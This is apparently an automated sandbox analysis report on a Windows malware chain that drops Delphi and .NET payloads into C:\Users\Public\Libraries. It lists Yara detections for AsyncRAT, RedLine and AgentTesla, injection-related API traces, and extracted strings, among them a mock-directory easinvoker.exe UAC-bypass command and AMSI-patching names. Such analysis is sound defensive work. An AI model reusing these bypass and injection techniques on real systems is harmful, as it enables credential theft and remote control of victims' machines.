Yara detected AsyncRAT, Source: 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.3232986846.0000000032001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.3232986846.0000000032001000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 4%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	14:33:05
Start date:	23/01/2024
Path:	C:\Users\Public\Libraries\Akaelkov.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Akaelkov.PIF"
Imagebase:	0x400000
File size:	1'743'360 bytes
MD5 hash:	344C9C0F72C535E334A4B605212C69D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 26%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	14:33:08
Start date:	23/01/2024
Path:	C:\Users\Public\Libraries\vokleakA.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\vokleakA.pif
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000001.2149766444.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000007.00000001.2149766444.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000002.2218197846.0000000024381000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000001.2149766444.0000000000450000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.2200611596.0000000000450000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.2200611596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000007.00000002.2200611596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.2200611596.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000001.2149766444.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000002.2219281239.0000000025FC1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	14:33:13
Start date:	23/01/2024
Path:	C:\Users\Public\Libraries\Akaelkov.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Akaelkov.PIF"
Imagebase:	0x400000
File size:	1'743'360 bytes
MD5 hash:	344C9C0F72C535E334A4B605212C69D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	14:33:16
Start date:	23/01/2024
Path:	C:\Users\Public\Libraries\vokleakA.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\vokleakA.pif
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000002.2300614392.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000009.00000002.2300614392.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000002.2300614392.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000002.2300614392.0000000000450000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000001.2234454714.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000009.00000001.2234454714.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000001.2234454714.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000001.2234454714.0000000000450000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000009.00000002.2320481183.0000000031EF1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	7.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	10.2%
Total number of Nodes:	606
Total number of Limit Nodes:	42

Executed Functions

Function 0415CA40 Relevance: 219.9, APIs: 12, Strings: 109, Instructions: 8183COMMON

Download Yara Rule

APIs

InetIsOffline.URL(00000000,00000000,04167AA9,?,?,?,000002BA,00000000,00000000), ref: 0415CA75

Part of subcall function 0411FD38: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,0411FE14), ref: 0411FD70
Part of subcall function 0411FD38: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0411FE14), ref: 0411FD7E
Part of subcall function 0411FD38: GetProcAddress.KERNEL32(74AD0000,00000000), ref: 0411FD97
Part of subcall function 0411FD38: GetCurrentProcess.KERNEL32(0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000,00000000,0411FE14), ref: 0411FDB3
Part of subcall function 0411FD38: NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000,00000000,0411FE14), ref: 0411FDB9
Part of subcall function 0411FD38: GetCurrentProcess.KERNEL32(0419A35C,Function_00006ADC,00000004,0419A360,00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0411FDE3
Part of subcall function 0411FD38: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0419A35C,Function_00006ADC,00000004,0419A360,00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000), ref: 0411FDE9
Part of subcall function 0411FD38: FreeLibrary.KERNEL32(74AD0000,00000000,0419A35C,Function_00006ADC,00000004,0419A360,00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000), ref: 0411FDF4

Part of subcall function 04108DE0: GetFileAttributesA.KERNEL32(00000000,?,0415D4C6,ScanString,0419A350,04167AE0,OpenSession,0419A350,04167AE0,ScanString,0419A350,04167AE0,UacScan,0419A350,04167AE0,UacInitialize), ref: 04108DEB

Part of subcall function 0410D570: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0428EB38,?,0415D7E7,ScanBuffer,0419A350,04167AE0,OpenSession,0419A350,04167AE0,ScanBuffer,0419A350,04167AE0,OpenSession), ref: 0410D587

Part of subcall function 0415B768: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0415B838), ref: 0415B7A3
Part of subcall function 0415B768: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0415B838), ref: 0415B7D3
Part of subcall function 0415B768: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0415B7E8
Part of subcall function 0415B768: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0415B814
Part of subcall function 0415B768: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0415B81D

Part of subcall function 04108E04: GetFileAttributesA.KERNEL32(00000000,?,0416062B,ScanString,0419A350,04167AE0,OpenSession,0419A350,04167AE0,OpenSession,0419A350,04167AE0,ScanBuffer,0419A350,04167AE0,ScanString), ref: 04108E0F

Part of subcall function 04108FCC: CreateDirectoryA.KERNEL32(00000000,00000000,?,041606D1,ScanBuffer,0419A350,04167AE0,ScanString,0419A350,04167AE0,OpenSession,0419A350,04167AE0,OpenSession,0419A350,04167AE0), ref: 04108FD9

Part of subcall function 0415B684: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0415B756), ref: 0415B6C3
Part of subcall function 0415B684: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0415B6FD
Part of subcall function 0415B684: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0415B72A
Part of subcall function 0415B684: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0415B733

Strings

I_QueryTagInformation, xrefs: 0416598F
DllRegisterServer, xrefs: 0415D169
CreateProcessAsUserW, xrefs: 04166A38, 04166A65
DlpGetArchiveFileTraceInfo, xrefs: 04166635
@^@, xrefs: 0415F0F0
EnumProcessModules, xrefs: 041669FC
CreateProcessA, xrefs: 04166A0B
VirtualProtect, xrefs: 04166C54
smartscreenps, xrefs: 0415D11A, 0415D14D, 0415D180
cmd /c "C:\\Windows \\System32\\easinvoker.exe", xrefs: 04164309
BCryptQueryProviderRegistration, xrefs: 0415CFA5, 0416586F
^^Nc, xrefs: 0415DEFE, 0415EA9C
endpointdlp, xrefs: 041665E6, 04166619, 0416664C, 0416667F
ScanString, xrefs: 0415CC9E, 0415CD77, 0415CEFC, 0415D08D, 0415D316, 0415D435, 0415D9AA, 0415EA26, 0415EBC2, 0415F07A, 0415F121, 0415F219, 0415F43E, 0415F764, 0415F988, 0415FA2D, 0415FD72, 041600AB, 041602BB, 04160599, 04160B27, 04160CD3, 04160F90, 04161451, 041615C6, 0416167E, 04161CFF, 04161F4C, 041641F8, 0416431F, 0416442C, 04164EC3, 041652CF, 041653E0, 041657EB, 04165D4F, 04166228, 04166336, 0416671D, 04166914, 04166B78, 04166E51, 0416737F
OpenProcess, xrefs: 04166C87
EnumServicesStatusExA, xrefs: 041669DE
RtlAllocateHeap, xrefs: 041667C6, 0416682C
SLGatherMigrationBlob, xrefs: 04166F2D
kernel32, xrefs: 04166C05, 04166C38, 04166C6B, 04166C9E, 04166CD1, 04166D04, 04166D37
SxTracerGetThreadContextDebug, xrefs: 04166EC7
[InternetShortcut], xrefs: 041614C1
NtDeviceIoControlFile, xrefs: 04166993
can, xrefs: 04162438
LdrGetProcedureAddress, xrefs: 04167191
WinHttp.WinHttpRequest.5.1, xrefs: 0415F6C2
NtWaitForSingleObject, xrefs: 041667F9
EnumServicesStatusA, xrefs: 041669C0
C:\Users\Public\Libraries, xrefs: 0415DA1F
.url, xrefs: 041609E3
FlushInstructionCache, xrefs: 04166CED
NtWriteVirtualMemory, xrefs: 041671C4
C:\Windows\System32\, xrefs: 0415D4B1, 041645A2, 041650DE
UacInitialize, xrefs: 0415CBD6, 0415D21E, 0415D92E, 04160A2F, 04164084, 04164FD0, 04165BFC, 04166A80
Initialize, xrefs: 0415CB0E, 0415D8B2, 0415DA35, 0415DBEA, 0415DD90, 0415E045, 0415EB46, 0415EFFE, 0415F2B8, 0415F3C2, 0415FAA9, 0415FCE3, 0415FF0B, 0416023F, 041606DD, 04160D4F, 04160F14, 04164DCB, 041655F0, 041659E2, 041664DD, 04166D59, 04167477
C:\Windows\SysWOW64, xrefs: 041622AC
wintrust, xrefs: 0415CD0A, 0415CD31, 0415CD58
TrustOpenStores, xrefs: 0415CCF9
NtSetSecurityObject, xrefs: 041659A3
RtlQueryProcessDebugInformation, xrefs: 041669B1
spp, xrefs: 04166EDE
SLGetEncryptedPIDEx, xrefs: 04166F60
http, xrefs: 0415F4AE
NtQueryInformationThread, xrefs: 04166FF9
FindCertsByIssuer, xrefs: 0415CD47
IconIndex=, xrefs: 04161524
EtwEventWrite, xrefs: 0416725D
C:\\Users\\Public\\Libraries\\, xrefs: 04160E3B
Kernel32, xrefs: 04166A10, 04166A1F, 04166A6A
DlpGetWebSiteAccess, xrefs: 04166668
URL=file:", xrefs: 041614D0
VirtualAllocEx, xrefs: 04166C21
advapi32, xrefs: 04165994
SetUnhandledExceptionFilter, xrefs: 04166D20
ntdll, xrefs: 041659A8, 041659BC, 041667AA, 041667DD, 04166810, 04166843, 04166876, 04166FAA, 04166FDD, 04167010, 04167043, 04167076, 041670A9, 041670DC, 0416710F, 04167142, 04167175, 041671A8, 041671DB, 0416720E, 04167241, 04167274, 041675E9
CreateProcessWithLogonW, xrefs: 04166A47
DlpCheckIsCloudSyncApp, xrefs: 04166602
Advapi, xrefs: 041669C5, 041669D4, 041669E3, 041669F2, 04166A2E, 04166A3D, 04166A4C
CreateProcessAsUserA, xrefs: 04166A29
ws2_32, xrefs: 04166A5B
DEEX, xrefs: 0415CA83
NtQueryVirtualMemory, xrefs: 04166FC6
Ntdll, xrefs: 04166989, 04166998, 041669A7, 041669B6
CryptSIPGetInfo, xrefs: 0415CE5D
NtAccessCheck, xrefs: 0416712B
ScanBuffer, xrefs: 0415CB72, 0415CDE7, 0415D011, 0415D556, 0415D663, 0415D76A, 0415DB2D, 0415DCE2, 0415DE88, 0415DF2C, 0415E13D, 0415E1B9, 0415E880, 0415EACA, 0415ECD8, 0415EDE2, 0415EF06, 0415F334, 0415F4D1, 0415F87C, 0415FBCB, 0415FE8F, 04160003, 041601C3, 04160371, 0416063F, 041607AC, 041608D7, 04160DCB, 04161088, 0416114A, 041612BE, 0416133A, 04161BE1, 04161E9F, 0416213E, 04164008, 04164297, 041646E8, 041647FF, 0416499C, 04164A37, 04164B2F, 041651A5, 041654E1, 0416566C, 0416591F, 04165C78, 04165F51, 0416606E, 04166130, 04166559, 041674F3
EtwEventWriteEx, xrefs: 0416722A
C:\\Windows \\System32\\easinvoker.exe, xrefs: 0416426E
BCryptRegisterProvider, xrefs: 0415CFD8, 04165883
bcrypt, xrefs: 0415CF89, 0415CFBC, 0415CFEF, 04165860, 04165874, 04165888, 0416643F
RtlCreateQueryDebugBuffer, xrefs: 0416685F
EnumServicesStatusW, xrefs: 041669CF
NtOpenFile, xrefs: 041671F7
NtQueryDirectoryFile, xrefs: 041669A2
NtQuerySystemInformation, xrefs: 04166984
DllGetActivationFactory, xrefs: 0415D136
OpenSession, xrefs: 0415CAAA, 0415D3B9, 0415D4DA, 0415D5E7, 0415D6EE, 0415DAB1, 0415DC66, 0415DE0C, 0415DFA8, 0415E0C1, 0415E235, 0415E8FC, 0415E9AA, 0415EC5C, 0415EE8A, 0415EF82, 0415F19D, 0415F54D, 0415F5D0, 0415F6E8, 0415F800, 0415F90C, 0415FB4F, 0415FDEE, 0415FF87, 04160127, 041603ED, 0416051D, 04160828, 04160953, 04160AAB, 04160BDB, 04160C57, 0416100C, 04161242, 041613B6, 0416154A, 041616FA, 04161B65, 04161D7B, 04161E23, 04161FC8, 041622D5, 04164100, 0416439B, 041644A8, 04164645, 0416487B, 04164920, 04164BAB, 04164D4F, 0416504C, 04165253, 04165364, 04165465, 0416576F, 041658A3, 04165ADA, 04165DCB, 04165E59, 041661AC, 041663B2, 04166461, 041666A1, 04166898, 04166AFC, 04166DD5, 041673FB, 0416756F
UacScan, xrefs: 0415CC3A, 0415D1A2, 0415D29A, 0415D836, 0415E804, 0415ED66, 0415F64C, 0415FC67, 04160E98, 041611C6, 04161C5D, 04162044, 04162236, 04162351, 0416417C, 04164524, 041645C9, 04164764, 04164AB3, 04164E47, 04164F54, 04165129, 04165574, 041656F3, 04165A5E, 04165B80, 04165ED5, 04165FF2, 041662A4
connect, xrefs: 04166A56
iexpress.exe, xrefs: 0415D6D8
CryptSIPGetSignedDataMsg, xrefs: 0415CEC3
LdrLoadDll, xrefs: 0416715E
NtGetWriteWatch, xrefs: 04166F93
NtMapViewOfSection, xrefs: 04167092
NtOpenProcess, xrefs: 041659B7, 041675E4
NtQuerySecurityObject, xrefs: 041670F8
NtAlertResumeThread, xrefs: 04166793
HotKey=, xrefs: 04161658
BCryptVerifySignature, xrefs: 0415CF72, 0416585B, 04166428
.png, xrefs: 0415DBA3, 0415E2AB, 0416729B, 041672E1, 0416732B, 04167352
GET, xrefs: 0415F7DB
C:\Users\Public\, xrefs: 041609D8, 0416176A
MZP, xrefs: 04165FC7
EnumServicesStatusExW, xrefs: 041669ED
WintrustAddActionID, xrefs: 0415CD20
WriteVirtualMemory, xrefs: 04166CBA
CreateProcessW, xrefs: 04166A1A
UacUninitialize, xrefs: 041621BA
